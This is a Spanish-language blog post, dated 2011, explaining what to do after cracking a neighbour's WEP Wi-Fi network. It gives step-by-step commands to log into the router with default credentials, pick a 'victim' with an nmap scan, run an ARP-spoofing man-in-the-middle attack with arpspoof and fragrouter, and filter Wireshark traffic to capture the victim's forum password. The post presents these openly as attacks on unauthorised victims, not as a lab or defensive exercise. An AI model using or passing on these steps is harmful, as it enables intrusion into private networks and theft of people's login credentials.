miércoles, 19 de enero de 2011

Despues de hackear un wifi

( Seguro que existen tecnicas mejores... pero esta es la mia...)

Hace un par de notas explique como hakear un wifi con backtrack o linux ( en el enlace http://naciounaidea.blogspot.com/2011/01/crack-wifi.html)
ahora explicare algunas cosillas que hacer una vez lo hemos hackeado...



los pass que petamos eran tipo telefonica clave WEP

a los ruters de telefonica accedemos por la pagina web 192.168.1.1 que es la puerta de enlace por defecto

y el usuario y contraseña por defecto es usu: 1234 y pass: 1234



si damos un vistazo al router ( en mi caso el clasico telefonica) zyxel en el apartado " Maintenance " > DHCP tables

veremos un listado de los ordenadores que estan conectados (puede q algunos no porq esten caducadas las sesiones)

y podemos ver su IP y mac



Desde nuestro linux instalaremos lo siguiente:

sudo apt-get install nmap (el famoso scaner)

sudo apt-get install dsniff (un sniffer)

sudo apt-get install wireshark (sniffer grafico)

sudo apt-get install fragrouter (para devolver el trafico)



utilizaremos una tecnica que se comonce como el man in the middele

(explicacion cutre)

consiste en engañar al router diciendole que nuestro ordenador es el de la victima de modo que su informacion

pasara por el nuestro y podremos ver sus contraseñas



seleccionando victima!

en la tabla del router como decimos puede estar caducadas las victimas por eso es mejor buscarlas en directo

para ello abriremos una consola i utilizaremos NMAP



#sudo nmap -sP 192.168.1.*

(esto hace un scaneo general de la ret)

en mi caso he escogido la 192.168.1.37 como victima



ya no necesitaremos mas datos

en nuestra consola miramos los siguientes datos con un #ifconfig

puerta de enlace ( el router) en telefonica por defecto 192.168.1.1

y nuestra interface en mi caso Wlan0 (si estais por wifi la q tenga buestra ip)





abrimos una consola i utilizamo Dsniff

#sudo arpspoof -i TARJETA_RED -t IP_VICTIMA IP_ROUTER

en mi caso:

sudo arpspoof -i wlan0 -t 192.168.1.37 192.168.1.1

lo dejamos en ejecucion

en otra consola

#sudo fragrouter -i wlan0 -B1



ya esta pasando todo el trafico de la victima por nuestra maquina





para realizar el ejemplo ire a un objetivo concreto el pass de f.com

si hacemos boton derecho ver codigo fuente veremos que la informacion del logeo veremos como el name del parametro es vb_login_password

abrimos Wireshark (en modo root)

en un terminal sudo wireshark.

es muyy simple por defecto la interfaz que tiene la ip damos a start

y filtraremos los paquetes

filter tcp contains login_password

cuando la victima acceda a f.com y se loguee veremos una entrada
http://www.blogger.com/img/blank.gif
boton derecho del raton "Follow tcp steam" y unicamente tenemos q buscar "vb_login_password" comentado anteriormente y tendremos su pass



me da palo seguir ya me lo currare mejor otro dia lo mismo cuelgo imageneres

salu2

No hay comentarios:

Publicar un comentario